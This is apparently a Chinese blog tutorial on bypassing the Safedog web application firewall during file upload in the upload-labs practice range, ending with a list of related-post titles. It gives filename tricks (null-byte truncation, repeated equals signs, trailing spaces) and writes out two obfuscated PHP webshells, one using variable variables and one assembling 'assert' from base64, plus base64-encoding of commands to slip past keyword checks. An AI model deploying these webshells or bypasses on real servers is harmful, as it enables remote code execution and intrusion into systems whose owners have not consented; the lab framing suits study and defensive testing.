【WAF剖析】——文件上传之安全狗bypass
作者名:Demo不是emo
主页面链接:主页传送门
创作初心:一切为了她
座右铭:不要让时代的悲哀成为你的悲哀
专研方向:网络安全,数据结构每日emo:保持心脏震荡,等有人与我共鸣
sql注入的WAF你会了,文件上传的WAF你见过吗,关注我,让我带你由简入难实战各个WAF,今天先来看看web安全渗透必会的安全狗WAF,你会绕吗?看我带你将它拿下
目录
一:环境配置
1.upload-labs的文件上传靶场
2.安全狗WAF软件
3.检测WAF是否生效
[1].创建一句话木马
[2].开启靶场环境
[3].尝试上传php文件
二:实际操作
1.基于文件名的绕过
[1].00截断
[2].多个等号
2.基于木马内容的绕过
[1].畸形传参木马
[2].经典编码木马
三:拓展内容
一:环境配置
1.upload-labs的文件上传靶场
这里也是直接给大家准备好了,链接如下,放在根目录下,到浏览器打开就能用了
upload-labs文件上传靶场-网络安全文档类资源-CSDN文库
2.安全狗WAF软件
这个应该很多人都没有,但是我肯定为大家准备好了啊,链接如下(就问服务到不到位)
链接:https://pan.baidu.com/s/1i7R28EWV7Bn6Errrxi9UAA?pwd=emlg
提取码:emlg
下载之后跟着提示安全即可
注意:1.安装成功之后记得开启安全狗的网站保护和文件上传防护
2.记得关闭安全狗的cc攻击防护,因为待会实战过程中尝试多次,可能被封ip
3.将文件上传的php后缀设置到黑名单,即防护上传的php文件
3.检测WAF是否生效
[1].创建一句话木马
[2].开启靶场环境
这里演示的环境是upload-labs靶场的第六关,这关没有WAF时的上传方法是抓包在文件名后面添加一个空格即可绕过。如下
没有配置WAF时将这里的“text.php”改为“text.php ”即可绕过限制
此时打开并选中刚才的php一句话木马
[3].尝试上传php文件
显示拦截页面,说明本次实验需要的环境已经搭好了
二:实际操作
这里就不做这么多原理的讲解了,因为讲起来太多了,所以这里就直接给大家介绍绕过姿势了
1.基于文件名的绕过
[1].00截断
先将"text.php"换成"text.php;.jpg", 这里的.jpg是为了混淆WAF和后端的后缀识别
再将;的hex编码替换为00,造成00截断,如下
此时放行试试数据包,效果如下:可以看到,已经绕过了WAF的检测,因为并没有弹出安全狗的拦截页面,但是后端的过滤还没有绕过,所以显示不允许该文件上传
刚才我们说了这关靶场后端的绕过方式是加一个空格,所以我们在刚才的基础上再加一个空格,就是把"text.php.jpg"变成”text.php .jpg“
此时再放行数据包,效果如下,成功上传
这里我们来尝试访问一下上传之后的php文件,又被拦截了
这又是为什么呢?这就是待会我要给大家讲的基于内容的拦截,不急,先给大家把绕过WAF上传限制的姿势讲了来
[2].多个等号
这个操作就更简单了,直接在文件名的位置把一个等于换成多个等于,也能绕过WAF,此时再在末尾加空格,直接成功上传,如下
2.基于木马内容的绕过
因为上面我们用的一句话木马是市面上最常见的一句话木马,基本上所有的WAF识别到这段内容都会将其拦截,这也是我们为什么上传了但是访问不了的原因,可以开启安全狗的木马扫描试试,如下
可以看到木马很快就被扫描出来了,还标记了一个常见木马,这可不行啊,得想办法啊,所以我们要做免杀一句话木马,让他扫描不出来,这里给大家准备了两个能够过安全狗的木马
[1].畸形传参木马
<?php$a = $_GET['x'];$$a = $_GET['y'];$b($_POST['z']);?>
使用方式如下
用get方式传如参数x和y,值分别为b和assert ,再用POST方式传如参数z,值为自己想执行的命令
可以看到能成功执行,达到木马的效果
[2].经典编码木马
通过assert函数的base64编码后的拼接即可绕过,如下:
代码如下
<?php$e=base64_decode("YXNz马赛克ZXJ0安全狗");$e($_POST['aa']);?>
此时浏览器访问该文件,POST方式传入参数aa,值为想要执行的命令即可,如下
成功执行,直接拿下
三:拓展内容
上面的绕过方式不可避免都有一些问题,那就是传参时使用了敏感关键字,比如phpinfo()之类的,有一些防火墙就会检测传入的参数是否含有敏感内容(例如宝塔),那这时候我们怎么办呢?
我们可以把传参使用的敏感关键字变成其他编码格式,比如base64,再在一句话木马中对传入的参数先做一个解码操作,如下
在木马中添加解码操作
就是把关键字拿去加密
传入加密过后的关键字
同样可以生效,成功绕过了关键字检测
希望大家看完后能有收获,感谢大家的阅读。
【WAF剖析】——文件上传之安全狗bypass相关推荐
- 文件上传绕过安全狗WAF实战
今天继续给大家介绍渗透测试相关知识,本文主要是文件上传绕过安全狗WAF实战. 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负! 再次强调:严禁对未 ...
- [网络安全自学篇] 三十三.文件上传之绕狗一句话原理和绕过安全狗(六)
这是作者的系列网络安全自学教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文详细讲解了Upload-labs靶场及文件上传漏洞20道CTF题目,并结合C ...
- 文件上传-绕过安全狗
1,3,4方法比较稳健 目录 1.用单双引号防匹配绕过 此版本安全狗免杀 2.filename="abc.jpg;.php" 3. filename==="xxx.php ...
- 【WAF剖析】——SQL注入之安全狗bypass深度剖析
作者名:Demo不是emo 主页面链接:主页传送门 创作初心:舞台再大,你不上台,永远是观众,没人会关心你努不努力,摔的痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷 座右铭:不要让时代的悲哀 ...
- 最新版安全狗(v4.0.2.665) 文件上传 绕过
0x00 前言: 继续上次 bypass 安全狗,这次测试的是 bypass 最新版安全狗来上传 php 一句话 0x01 实验环境: win7 sp1 + phpstudy v8.1(apache ...
- jsp文件上传_文件上传
一.文件上传的目的--脚本文件 文件上传的一共可造成三种危害,从低到高分别是,任意内容文件,html文件,脚本文件. 任意内容文件 任意内容文件指的是虽然文件后缀不可控,但是文件内容可控,比如我可以上 ...
- 文件上传保姆级教程(原理,大小马,CTF,防御,绕狗一句话,upload-labs)
文章目录 文件上传漏洞简历 产生原因 危害 容易出现文件上传漏洞的地方 概括 环境搭建 一句话马 一句话木马原理 webshell常用的一句话 图片一句话 小马与大马的区别 webshell管理工具 ...
- 任意文件上传之绕过云waf+本地防火墙双重防护
0x01 waf拦截 在打某市 Hvv 第一天就找到一个文件上传的点,经过测试,可以直接任意文件上传,没有什么道理. 直接尝试上传 Php 文件,被 waf 拦截了 不知道这是哪家的waf,知道的师傅 ...
- 文件上传绕waf(waf拦不住我)
一. 什么是文件上传漏洞 Web应用程序通常会有文件上传的功能, 例如在 BBS发布图片 , 在个人网站发布ZIP 压缩 包, 在办公平台发布DOC文件等 , 只要 Web应用程序允许上传文件, 就有 ...
最新文章
- qt4.7 字体字号设设置;中文乱码,
- webpack初体验
- 读取Xml文档的元素和属性
- socket和http区别有哪些
- oracle创建目录的命令,使用create database命令手工创建Oracle数据库
- ADC内设与外设的区别
- linux sed工具,玩转Linux - 神级工具 sed awk
- 学习nodejs之hello world
- 常用牛人主页链接(计算机视觉、模式识别、机器学习相关方向,陆续更新。。。。)...
- 【渝粤题库】陕西师范大学800005 人文地理学
- 深度学习优化算法大全系列2: Momentum(动量)
- SQL数据库打包发送与接收
- 三妈式初音miku_【MMD模型】三妈式初音 Appearance Miku 原版
- 《七周七并发模型》作者Paul Butcher、阿里云研究员余锋(褚霸)——QCon北京2016前瞻...
- 玩转EXCEL系列-选择性粘贴几个实用技巧
- 【9】数据可视化:基于 Echarts + Python 实现的动态实时大屏 - 酒店行业
- 【人工翻译线代教材】Introduction to Linear Algebra BY Gilbert Strang【MIT】【线代】【翻译】
- BZOJ4487 JSOI2015染色问题(组合数学+容斥原理)
- 关于STM32G071RB的ADC采集误差问题
- Linux的 常用命令
热门文章
- 地平线征程5「卖爆」:理想L8首发,国产大算力芯片开启量产大潮
- hive-5(窗口函数)
- 应用程序图标变成白色
- led灯选用什么品牌的比较好?2022最新led光源品牌排行榜
- 网址出现dns_probe_finished_no_internet
- 《问题笔记》【Visual Studio】 webView.LoadUrl(“file:///android_asset/mypage.html“)本地页面出现Invalid file path情况
- android 本地图片模糊,Android端图片模糊的实现原理及方案
- 睡梦音乐声悠悠...
- 关于array_column这个函数
- echarts网络拓扑图动态流程图